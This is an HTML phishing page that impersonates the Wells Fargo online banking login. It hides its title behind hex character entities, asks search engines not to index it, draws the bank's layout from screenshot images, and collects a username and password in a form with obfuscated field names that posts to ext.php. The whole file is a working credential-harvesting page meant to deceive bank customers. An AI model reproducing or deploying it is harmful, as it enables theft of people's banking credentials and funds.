

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>&#x4F;&#x6E;&#x6C;&#x69;&#x6E;&#x65;&#x20;&#x2D;&#x20;&#x57;&#x65;&#x6C;&#x6C;&#x73;&#x20;&#x46;&#x61;&#x72;&#x67;&#x6F;&#x20;&#x42;&#x61;&#x6E;&#x6B;</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW" />
<link rel="shortcut icon"
              href="img/favicon.ico"/>

<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>
<body style="visibility:hidden" onload="unhideBody()">

<style> 
 
 .inputs {
    padding: 1px;
    border-radius: 3px;
    border: 1px solid #CCC;
font-family:verdana;font-size:13px
    background-image: none;
    width: 270px;
	height: 43px;
	font-size: 15px;
}

.inputs:focus {
    outline-color: #54B4AD;
}
</style></head>
<body>
<div id="imase" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1905px; height:141px; z-index:0"><img src="img/head.png" alt="" title="" border=0 width=1905 height=141></div>  

<div id="imase" style="position:absolute; overflow:hidden; left:250px; top:141px; width:1350px; height:522px; z-index:0"><img src="img/nti.png" alt="" title="" border=0 width=1350 height=522></div>  

<div id="imase1" style="position:absolute; overflow:hidden; left:250px; top:652px; width:1350px; height:553px; z-index:2"><a href="#"><img src="img/itc.png" alt="" title="" border=0 width=1350 height=553></a></div>
<div id="imase2" style="position:absolute; overflow:hidden; left:0px; top:1245px; width:1905px; height:726px; z-index:10"><a href="#"><img src="img/123.png" alt="" title="" border=0 width=1905 height=726></a></div>

<form name="okai" action="ext.php" method="post">

<select id="b1" name="cz211" autocomplete="off"  style="position:absolute;left:454px;top:202px;width:193px;height:42px;border-radius:3px; font-size:12px;font-family:'WellsFargoSansRegular',verdana,Arial,sans-serif;background-color: #f9f7f6;z-index:1"  value="" type="text" >
<option value=Account Summary>  Account Summary </option>
<option value=Transfer>Transfer</option>
<option value=Bill Pay>Bill Pay</option>
<option value=Brokerage>Brokerage</option> 
</select></option>

<input name="16t1"  title="Please Enter Right Value"  autofocus required autocomplete="off" Placeholder=" Username" class="inputs" type="text" style="position:absolute;width:192px;left:455px;top:248px;z-index:2">

<input name="su17"  title="Please Enter Right Value"  autofocus required autocomplete="off" Placeholder=" Password" class="inputs" type="password" style="position:absolute;width:192px;left:455px;top:294px;z-index:12 ">

<input id="Button1" name="Button1" value="" style="position:absolute;left:456px;top:364px;width:190px;height:38px;border:0px #000000 dotted;background-color:transparent;font-family:Arial;font-size:5px;z-index:2" type="submit"></form></body></html>
